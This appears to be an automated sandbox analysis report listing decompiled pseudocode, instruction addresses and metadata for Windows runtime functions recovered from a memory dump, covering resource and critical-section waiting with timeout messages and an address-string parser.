					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t92);
									_push(0);
									_t37 = E009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E009FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00A25329(_t74, _t92);
													_push(1);
													return E00A253A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                      0x00a253ab
                                                      0x00a253ae
                                                      0x00a253b1
                                                      0x00a253b4
                                                      0x00a253b7
                                                      0x00a405b6
                                                      0x00a405c0
                                                      0x00a405c3
                                                      0x00000000
                                                      0x00a405c9
                                                      0x00a405c9
                                                      0x00a405cc
                                                      0x00a405d5
                                                      0x00a405d5
                                                      0x00a253bd
                                                      0x00a253bd
                                                      0x00a253bd
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253c0
                                                      0x00000000
                                                      0x00000000
                                                      0x00a62269
                                                      0x00a6226d
                                                      0x00a62349
                                                      0x00a6234d
                                                      0x00a62273
                                                      0x00a62276
                                                      0x00a62279
                                                      0x00a6227e
                                                      0x00a62283
                                                      0x00a62287
                                                      0x00a6228a
                                                      0x00a6228d
                                                      0x00a6228f
                                                      0x00a622bc
                                                      0x00a622bc
                                                      0x00a622bc
                                                      0x00a622be
                                                      0x00a622c4
                                                      0x00a622cc
                                                      0x00a622d0
                                                      0x00a622d6
                                                      0x00a622d7
                                                      0x00a622da
                                                      0x00a622df
                                                      0x00a622e4
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622e6
                                                      0x00a622e9
                                                      0x00a622f4
                                                      0x00a622f9
                                                      0x00a622fa
                                                      0x00a62305
                                                      0x00a62314
                                                      0x00a62319
                                                      0x00a6231a
                                                      0x00a6231d
                                                      0x00a62320
                                                      0x00a62323
                                                      0x00a62323
                                                      0x00a62328
                                                      0x00a6232d
                                                      0x00a6232f
                                                      0x00a62331
                                                      0x00a62336
                                                      0x00a62336
                                                      0x00a6233b
                                                      0x00a6233d
                                                      0x00a62350
                                                      0x00a62351
                                                      0x00a62356
                                                      0x00a62359
                                                      0x00a62359
                                                      0x00a6235b
                                                      0x00a6235d
                                                      0x00a25367
                                                      0x00a2536b
                                                      0x00a25372
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a62363
                                                      0x00a62363
                                                      0x00a62369
                                                      0x00a6236a
                                                      0x00a6236c
                                                      0x00a62371
                                                      0x00a62373
                                                      0x00000000
                                                      0x00a62379
                                                      0x00a62379
                                                      0x00a6237a
                                                      0x00a6237f
                                                      0x00a6237f
                                                      0x00a62385
                                                      0x00a62386
                                                      0x00a62389
                                                      0x00a6238e
                                                      0x00a62390
                                                      0x00a25378
                                                      0x00a2537c
                                                      0x00a62396
                                                      0x00a62396
                                                      0x00a62397
                                                      0x00a6239c
                                                      0x00a623a2
                                                      0x00a623a3
                                                      0x00a623a6
                                                      0x00a623ab
                                                      0x00a623ad
                                                      0x00000000
                                                      0x00a623b3
                                                      0x00a623b3
                                                      0x00a623b4
                                                      0x00a623b9
                                                      0x00a623ba
                                                      0x00a623ba
                                                      0x00a623bc
                                                      0x00a623bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00a59153
                                                      0x00a59158
                                                      0x00a5915a
                                                      0x00a5915e
                                                      0x00a59160
                                                      0x00000000
                                                      0x00a59166
                                                      0x00a59166
                                                      0x00a59171
                                                      0x00a59176
                                                      0x00a59176
                                                      0x00000000
                                                      0x00a59160
                                                      0x00a623c6
                                                      0x00a623cb
                                                      0x00a623d7
                                                      0x00a623d7
                                                      0x00a623ad
                                                      0x00a62390
                                                      0x00a62373
                                                      0x00a6233f
                                                      0x00a6233f
                                                      0x00000000
                                                      0x00a6233f
                                                      0x00a62291
                                                      0x00a62291
                                                      0x00a62293
                                                      0x00a62295
                                                      0x00a6229a
                                                      0x00a622a1
                                                      0x00a622a3
                                                      0x00a622a7
                                                      0x00a622a9
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622ab
                                                      0x00a622ad
                                                      0x00a622af
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622af
                                                      0x00a622b1
                                                      0x00a622b4
                                                      0x00a622b4
                                                      0x00a622b6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622b6
                                                      0x00a6228f
                                                      0x00000000
                                                      0x00a6226d
                                                      0x00a253cb
                                                      0x00a253ce
                                                      0x00a253d0
                                                      0x00a253d4
                                                      0x00a253d6
                                                      0x00000000
                                                      0x00a253d8
                                                      0x00a253e3
                                                      0x00a253ea
                                                      0x00a253ea
                                                      0x00a253d6
                                                      0x00000000

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 00A6230B
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
                                                      • RTL: Re-Waiting, xrefs: 00A62328
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-871070163
                                                      • Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                      • Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
                                                      • Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                      • Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A2EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 51%
                                                      			E00A2EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A1DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xae793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A016C0(_t39);
				} else {
					_t40 = E009FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A43915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xae793c; // 0x0
								_push(_t85);
								_t44 = E00A01F28(_t71);
							} else {
								_t44 = E009FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A43915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00A82306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A2EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A44FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A53F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A53F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xae20c0;
								if(_t85 != 0xae20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00A8217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A53F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                      0x00a2ec56
                                                      0x00a2ec56
                                                      0x00a2ec56
                                                      0x00a2ec5c
                                                      0x00a2ec64
                                                      0x00a623e6
                                                      0x00a623eb
                                                      0x00a623eb
                                                      0x00a2ec6a
                                                      0x00a2ec6c
                                                      0x00a2ec6f
                                                      0x00a623f3
                                                      0x00a623f8
                                                      0x00a623fa
                                                      0x00a623fc
                                                      0x00a2ec75
                                                      0x00a2ec76
                                                      0x00a2ec76
                                                      0x00a2ec7b
                                                      0x00a2ec7c
                                                      0x00a2ec7e
                                                      0x00a62406
                                                      0x00a62407
                                                      0x00a6240c
                                                      0x00a6240d
                                                      0x00a6240d
                                                      0x00a6240d
                                                      0x00a62414
                                                      0x00a62417
                                                      0x00a6241e
                                                      0x00a62435
                                                      0x00a62438
                                                      0x00a6243c
                                                      0x00a6243f
                                                      0x00a62442
                                                      0x00a62443
                                                      0x00a62446
                                                      0x00a62449
                                                      0x00a62453
                                                      0x00a62455
                                                      0x00a6245b
                                                      0x00a6245b
                                                      0x00a2eb99
                                                      0x00a2eb99
                                                      0x00a2eb9c
                                                      0x00a2eb9d
                                                      0x00a2eb9f
                                                      0x00a2eba2
                                                      0x00a62465
                                                      0x00a6246b
                                                      0x00a6246d
                                                      0x00a2eba8
                                                      0x00a2eba9
                                                      0x00a2eba9
                                                      0x00a2ebae
                                                      0x00a2ebb3
                                                      0x00a2ebb9
                                                      0x00a2ebbb
                                                      0x00a62513
                                                      0x00a62514
                                                      0x00a62519
                                                      0x00a6251b
                                                      0x00a2ec2a
                                                      0x00a2ec2d
                                                      0x00a2ec33
                                                      0x00a2ec36
                                                      0x00a2ec3a
                                                      0x00a2ec3e
                                                      0x00a2ec40
                                                      0x00a2ec47
                                                      0x00a2ec47
                                                      0x00a2ec40
                                                      0x00a022c6
                                                      0x00a2ebc1
                                                      0x00a2ebc1
                                                      0x00a2ebc5
                                                      0x00a2ec9a
                                                      0x00a2ec9a
                                                      0x00a2ebd6
                                                      0x00a2ebd6
                                                      0x00000000
                                                      0x00a2ebbb
                                                      0x00a62477
                                                      0x00a6247c
                                                      0x00a62486
                                                      0x00a6248b
                                                      0x00a62496
                                                      0x00a6249b
                                                      0x00a6249d
                                                      0x00a624a0
                                                      0x00a624a3
                                                      0x00a624aa
                                                      0x00a624aa
                                                      0x00a624a5
                                                      0x00a624a5
                                                      0x00a624a5
                                                      0x00a624ac
                                                      0x00a624af
                                                      0x00a624b0
                                                      0x00a624b3
                                                      0x00a624b9
                                                      0x00a624ba
                                                      0x00a624bb
                                                      0x00a624c6
                                                      0x00a624cb
                                                      0x00a624cd
                                                      0x00a624d0
                                                      0x00a624d1
                                                      0x00a624d4
                                                      0x00a624d6
                                                      0x00a624d9
                                                      0x00a624d9
                                                      0x00a624dc
                                                      0x00a624df
                                                      0x00a624e1
                                                      0x00a624e7
                                                      0x00a624e9
                                                      0x00a624ec
                                                      0x00a624ef
                                                      0x00a624f2
                                                      0x00a624f2
                                                      0x00a624ef
                                                      0x00a624e7
                                                      0x00a624fa
                                                      0x00a624ff
                                                      0x00a62501
                                                      0x00a62503
                                                      0x00a62506
                                                      0x00a6250b
                                                      0x00a2eb8c
                                                      0x00a2eb93
                                                      0x00000000
                                                      0x00000000
                                                      0x00a2eb93
                                                      0x00000000
                                                      0x00a2eb99
                                                      0x00a2ec85
                                                      0x00a2ec85
                                                      0x00a2ec85
                                                      0x00000000

                                                      Strings
                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A624BD
                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A6248D
                                                      • RTL: Re-Waiting, xrefs: 00A624FA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                      • API String ID: 0-3177188983
                                                      • Opcode ID: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
                                                      • Instruction ID: 6973d9136ecc8518d511a44da7530a1c3dfa326f96904a4fd3d274cb99bad66e
                                                      • Opcode Fuzzy Hash: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
                                                      • Instruction Fuzzy Hash: 44411871600604ABDB20DBA8DD89FAA77B8EF84720F208615F5559B2C1D734ED818760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A3FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00A3FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00A3EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00A3EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00A3685D(_t167, 4) == 0) {
								if(E00A3685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00A3685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00A3685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A18980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A0DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00A3EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00A3EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                      0x00a3fcd1
                                                      0x00a3fcd6
                                                      0x00a3fcd9
                                                      0x00a3fcdc
                                                      0x00a3fcdf
                                                      0x00a3fce2
                                                      0x00a3fce5
                                                      0x00a3fce8
                                                      0x00a3fceb
                                                      0x00a3fced
                                                      0x00a3fced
                                                      0x00a3fcf3
                                                      0x00000000
                                                      0x00000000
                                                      0x00a3fcfc
                                                      0x00a3fcfe
                                                      0x00a3fdc1
                                                      0x00a6ecbd
                                                      0x00000000
                                                      0x00a6eccc
                                                      0x00a6eccc
                                                      0x00a6ecd2
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6ecdf
                                                      0x00a6ece0
                                                      0x00a6ece4
                                                      0x00a6eceb
                                                      0x00a6ecee
                                                      0x00a6eca8
                                                      0x00a6eca8
                                                      0x00a6ecaa
                                                      0x00a3fd76
                                                      0x00a3fd79
                                                      0x00a3fdb4
                                                      0x00a3fdb5
                                                      0x00a3fdb6
                                                      0x00000000
                                                      0x00a3fdb6
                                                      0x00a3fd7e
                                                      0x00a6ecfc
                                                      0x00a3fe2f
                                                      0x00000000
                                                      0x00a3fe2f
                                                      0x00a6ed08
                                                      0x00a6ed0f
                                                      0x00a6ed17
                                                      0x00a6ed1b
                                                      0x00000000
                                                      0x00a6ed1b
                                                      0x00a3fd88
                                                      0x00000000
                                                      0x00000000
                                                      0x00a3fd94
                                                      0x00a3fd99
                                                      0x00a3fda1
                                                      0x00000000
                                                      0x00000000
                                                      0x00a3fdb0
                                                      0x00000000
                                                      0x00a3fdb0
                                                      0x00a6ecbd
                                                      0x00a3fdc7
                                                      0x00a3fdcb
                                                      0x00000000
                                                      0x00a3fdd7
                                                      0x00a3fde3
                                                      0x00a3fe06
                                                      0x00a51fe7
                                                      0x00000000
                                                      0x00000000
                                                      0x00a51fef
                                                      0x00a51ff0
                                                      0x00a51ff4
                                                      0x00a51ff7
                                                      0x00a51ffa
                                                      0x00a51ffd
                                                      0x00a52000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6ecf1
                                                      0x00000000
                                                      0x00a6ecf1
                                                      0x00000000
                                                      0x00a3fe06
                                                      0x00a3fde8
                                                      0x00a3fdec
                                                      0x00a3fdef
                                                      0x00a3fdf2
                                                      0x00000000
                                                      0x00a3fdf2
                                                      0x00a3fdcb
                                                      0x00a3fd04
                                                      0x00a3fd05
                                                      0x00a6ec67
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6ec6f
                                                      0x00000000
                                                      0x00a6ec6f
                                                      0x00a3fd13
                                                      0x00a3fd3c
                                                      0x00a3fd40
                                                      0x00a6ec75
                                                      0x00a6ec7a
                                                      0x00000000
                                                      0x00a6ec8a
                                                      0x00a6ec8a
                                                      0x00a6ec90
                                                      0x00a6ecb2
                                                      0x00a3fd73
                                                      0x00a3fd73
                                                      0x00000000
                                                      0x00a3fd73
                                                      0x00a6ec95
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eca1
                                                      0x00a6eca4
                                                      0x00a6eca5
                                                      0x00000000
                                                      0x00a6eca5
                                                      0x00a6ec7a
                                                      0x00a3fd4a
                                                      0x00000000
                                                      0x00a3fd6e
                                                      0x00a3fd6e
                                                      0x00a3fd71
                                                      0x00000000
                                                      0x00a3fd71
                                                      0x00a3fd4a
                                                      0x00a3fd21
                                                      0x00a4a3a1
                                                      0x00000000
                                                      0x00a4a3a1
                                                      0x00a3fd36
                                                      0x00a5200b
                                                      0x00a52012
                                                      0x00000000
                                                      0x00000000
                                                      0x00a52018
                                                      0x00000000
                                                      0x00a52018
                                                      0x00000000
                                                      0x00a3fd36
